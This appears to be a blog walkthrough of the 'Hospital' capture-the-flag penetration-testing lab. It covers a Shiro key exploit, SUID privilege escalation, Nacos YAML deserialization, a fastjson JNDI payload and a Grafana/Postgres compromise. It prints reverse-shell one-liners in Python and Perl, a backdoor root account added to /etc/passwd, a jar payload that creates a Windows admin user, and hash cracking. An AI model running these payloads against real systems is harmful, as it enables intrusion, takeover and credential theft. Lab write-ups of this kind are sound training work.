banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

Spring and Autumn Cloud Mirror Simulation Shooting Range Hospital Practical Operation

[[Simulation Target - Hospital]]#

Overview#

In this scenario, you will play the role of a penetration testing engineer sent to test the network security of a hospital. Your goal is to successfully gain access to all servers to assess the company's network security status. There are a total of 4 flags in this target, distributed across different target machines.

image

Target Architecture

image

Information Gathering#

The fscan scan yielded the following content:

image

There is a website and a heapdump file on port 8080, access the /actuator directory

http://39.99.225.90:8080/actuator

image

Visit the website and log in to the backend with weak credentials

image

Vulnerability Exploitation#

After logging into the backend, shiro is detected

image

Unable to brute-force the key, the previous heapdump file contains the key

image

algMode = CBC, key = GAYysgMQhG7/CzIJlVpR2g==, algName = AES

Brute-force chain

image

Execute command

image

Generate memory shell, connect with Ant Sword

image

Privilege Escalation#

Look for files with SUID permissions, vim.basic can directly edit files as root

image

Reverse shell from Ant Sword to the cloud server

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'

Need to upgrade to an interactive terminal.

python3 -c "import pty;pty.spawn('/bin/bash')"

script /dev/null -c bash
ctrl+z
stty raw -echo; fg
reset
xterm-256color

Modify /etc/passwd using vim.basic for privilege escalation

openssl passwd -1 -salt 123 123456

Generate password

Add an account to the /etc/passwd file

hacker:$1$123$7mft0jKnzzvAdU4t0unTG1:0:0:/root:/bin/bash

flag01#

After adding, switch to the newly added account using su, this server is web01, obtain the value of flag01

su hacker

image

Reference: https://cloud.tencent.com/developer/article/1711865

Internal Network Scanning#

Run fscan for scanning

172.30.12.236:8080 open
172.30.12.5:8080 open
172.30.12.6:445 open
172.30.12.6:139 open
172.30.12.6:135 open
172.30.12.236:22 open
172.30.12.5:22 open
172.30.12.236:8009 open
172.30.12.6:8848 open
[*] NetInfo 
[*]172.30.12.6
   [->]Server02
   [->]172.30.12.6
[*] NetBios 172.30.12.6     WORKGROUP\SERVER02            
[*] WebTitle http://172.30.12.5:8080   code:302 len:0      title:None Redirect URL: http://172.30.12.5:8080/login;jsessionid=AA88B536A2B3199D4BB9686F35367F34
[*] WebTitle http://172.30.12.5:8080/login;jsessionid=AA88B536A2B3199D4BB9686F35367F34 code:200 len:2005   title:Medical Management Backend
[*] WebTitle http://172.30.12.6:8848   code:404 len:431    title:HTTP Status 404 – Not Found
[*] WebTitle http://172.30.12.236:8080 code:200 len:3964   title:Hospital Backend Management Platform
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos 
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos-v1-auth-bypass 
[+] PocScan http://172.30.12.5:8080 poc-yaml-spring-actuator-heapdump-file 

Two assets were discovered as follows

http://172.30.12.6:8848 poc-yaml-alibaba-nacos poc-yaml-alibaba-nacos-v1-auth-bypass 
http://172.30.12.236:8080 code:200 len:3964   title:Hospital Backend Management Platform

There is a nacos service on the internal network 172.30.12.6 with the default password nacos/nacos
http://172.30.12.236:8080 has a fastjson service


flag02#

Use venom to proxy the internal network, admin listens on the port, agent initiates the connection:

./admin_macos_x64 -lport 9999
./agent_linux_x64 -rhost x.x.x.x(vps ip) -rport 9999

Access the nacos application

http://172.30.12.6:8848/nacos/

image

Read the configuration file

image

datasource:

mysql:

url: jdbc:mysql://localhost:3306/test?useSSL=false&serverTimezone=UTC&allowPublicKeyRetrieval=true

username: root

password: P@ssWord!!!

In the rollback configuration file of db-config, you can see the malicious configuration jar package, the content is roughly as follows, initially thought it was to roll back to the following configuration, but after resetting the environment several times, testing found that it does not need to roll back, the following is the manual configuration file

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://172.30.12.5:802/yaml-payload.jar"]
  ]]
]

Use tools for exploitation

Need to compile the malicious payload, reference project: https://github.com/artsploit/yaml-payload

Just modify the content of AwesomeScriptEngineFactory.java, since the target is a windows machine, you can add an account, and the target server also has port 3389 open

public AwesomeScriptEngineFactory() {
	try {
		Runtime.getRuntime().exec("net user lca Lca@123 /add");
		Runtime.getRuntime().exec("net localgroup administrators lca /add");
	} catch (IOException e) {
		e.printStackTrace();
	}
}

Then compile it using Java 1.8, must use Java 1.8 to compile

javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .

Upload to the web01 server (the one with flag01), start a python service on web01, let web02 (172.30.12.6) download the malicious jar package, then use the tool NacosExploitGUI_v3.9 to send the request, the jar path is the path of the python started web service

java -jar NacosExploitGUI_v3.9.jar

image

web01 receives the request, indicating that 172.30.12.6 has downloaded the malicious payload, next is to verify whether the account has been successfully added

image

Set up a proxy on the local computer using proxifier, connect to 3389

image

image

Connection successful, obtain flag02, this server is web02

image

Nacos related vulnerabilities:

Nacos Internal Cluster Raft Deserialization Vulnerability
Nacos JRaft Hessian Deserialization Vulnerability Exploitation Tool


flag03#

Another machine has a fastjson vulnerability

image

To avoid going out of the network, start JNDI on 172.30.12.5 (web01)

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://localhost:1389/badNameClass",
        "autoCommit":true
    }
}

Need to enable lower-level proxy on yakit

image

Obtain flag03, this machine is web03


flag04#

To access the last machine from the local computer, a two-layer internal network proxy is needed. This machine has grafana+postgres services, and grafana has weak credentials, allowing direct login to the backend.

The grafana backend can execute postgres commands, reverse a low-privilege shell to the web03 server

CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;

select system('perl -e \'use Socket;$i="172.30.54.179";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');

On web3, download https://github.com/A-D-Team/grafanaExp, use the above exp (CVE-2021-43798) to read the account password, then log in to the postgres account

./grafanaExp exp -u http://172.30.54.12.:3000/

Read the account password postgres@123, log in using psql

psql -h 172.30.54.12 -U postgres -W

postgres=# select version();

# Check that the administrator's password is in md5 format
postgres=# SHOW is_superuser;

Use hashcat to crack, the password for the root database is P@ssw0rd123

hashcat -w 4 -m 0 -a 0 hashfile.txt /usr/share/wordlists/rockyou.txt -O

Then log in with the root user, using the absolute path for psql

sudo /usr/local/postgresql/bin/psql

Input \? to switch to command line, find flag04

image

Reference#

https://h0ny.github.io/posts/Hospital-%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83/#grafana-unauthorized-arbitrary-file-reading-cve-2021-43798

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.